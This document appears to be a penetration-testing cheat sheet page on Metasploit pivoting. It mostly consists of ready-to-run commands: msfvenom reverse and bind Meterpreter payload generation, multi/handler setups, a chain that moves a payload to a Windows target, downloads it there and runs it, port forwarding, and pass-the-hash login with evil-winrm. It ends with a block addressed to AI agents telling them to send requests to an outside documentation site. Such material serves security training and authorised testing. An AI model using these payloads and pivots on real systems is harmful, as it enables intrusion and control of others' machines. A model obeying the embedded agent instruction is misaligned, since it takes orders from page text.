# MSF Tunneling #### Configuring MSF SOCKS Proxy ``` use auxiliary/server/socks_proxy set SRVPORT 9050 set version 4a run ``` **Confirm Proxy Server is Running** ``` jobs ``` * Add line to /etc/proxychains.conf if needed - for tools external to MSF to use this proxy ``` socks4 127.0.0.1 9050 ``` **Instruct socks\_proxy Module to Route All Traffic via Meterpreter Session** ``` use post/multi/manage/autoroute set SESSION 2 set SUBNET 192.168.1.0 # IF MANUAL ENTRY DESIRED OTHERWISE IT WILL AUTO SELECT BASED ON HOST ROUTING TABLE run ``` **Alternatively Add Routes from Meterpreter Session** ``` run autoroute -s 172.16.5.0/23 ``` **List Active Routes** ``` run autoroute -p ``` #### Setup Auto Route ``` use post/multi/manage/autoroute set session 1 exploit ``` #### Set Up Proxy ``` use auxiliary/server/socks_proxy set srvhost 127.0.0.1 set version 5 exploit -j ``` * Verify proxychains conf *** ### Routes #### List Routes ``` route ``` #### Add Route ``` route add 10.9.10.0 255.255.255.0 1 route add 10.9.30.0 255.255.255.0 1 ``` #### Delete Route ``` route del 172.16.237.0 255.255.255.0 1 ``` ### Meterpreter Tunneling & Port Forwarding #### Meterpreter Tunneling and Port Forwarding **Get Meterpreter Session on Pivot Host** ``` msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.148 -f elf -o backupjob LPORT=8080 ``` **Start msfconsole Listener** ``` set lhost 0.0.0.0 set lport 8080 set payload linux/x64/meterpreter/reverse_tcp run ``` **Execute Payload on Pivot Host** ``` chmod +x backupjob ./backupjob ``` **Ping Sweep from Meterpreter Session** ``` run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23 ``` *** ### Local Port Forward #### Port Forwarding - Executed from Meterpreter Session ``` help portfwd ``` **Local TCP Relay** ``` portfwd add -l 3300 -p 3389 -r 172.16.5.19 ``` * `-l 3300` - Listener on attack machine to forward 3300 to 3389 on `-r` IP **Connect via RDP** ``` xfreerdp /v:localhost:3300 /u:victor /p:pass@123 ``` **Evil-WinRM** ``` evil-winrm -i 127.0.0.1 -P 5999 -u administrator -H 'f7c883121d0f63ee5b4312ba7572689b' ``` *** ### Remote Port Forward #### Reverse Port Forwarding - Executed from Meterpreter Session ``` portfwd add -R -l 8081 -p 1234 -L 10.10.14.148 ``` * 1234 listener on pivot host will forward to 10.10.14.148:8081 **Background Session and Start multi/handler** ``` set payload windows/x64/meterpreter/reverse_tcp set LPORT 8081 set LHOST 0.0.0.0 run ``` **Generate Payload** ``` msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234 ``` * Transfer and execute payload on Windows host to get Meterpreter session *** ## Payload Generation for Pivoting ### Windows Reverse HTTPS (through SSH reverse port forward) ```bash msfvenom -p windows/x64/meterpreter/reverse_https lhost= -f exe -o backupscript.exe LPORT=8080 ``` ### Windows Bind TCP (for socat bind shell relay) ```bash msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupjob.exe LPORT=8443 ``` *** ## Handler Configurations ### Reverse HTTPS (for SSH reverse port forward) ``` msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https msf6 exploit(multi/handler) > set lhost 0.0.0.0 msf6 exploit(multi/handler) > set lport 8000 msf6 exploit(multi/handler) > run ``` ### Bind TCP (for socat bind shell relay) ``` msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp msf6 exploit(multi/handler) > set RHOST 10.129.202.64 msf6 exploit(multi/handler) > set LPORT 8080 msf6 exploit(multi/handler) > run ``` *** ## Pivot File Transfer Chain SCP payload to pivot host: ```bash scp backupscript.exe ubuntu@:~/ ``` Start HTTP server on pivot: ```bash python3 -m http.server 8123 ``` Download on Windows target: ```powershell Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe" ``` *** ## rdp\_scanner Auxiliary Module ``` msf6 > search rdp_scanner msf6 > use 0 msf6 auxiliary(scanner/rdp/rdp_scanner) > set rhosts 172.16.5.19 msf6 auxiliary(scanner/rdp/rdp_scanner) > run ``` *** ## Ping Sweep One-Liners Linux bash: ```bash for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done ``` Windows CMD: ``` for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply" ``` Windows PowerShell: ```powershell 1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"} ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/c2-frameworks/metasploit/msf-tunneling.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.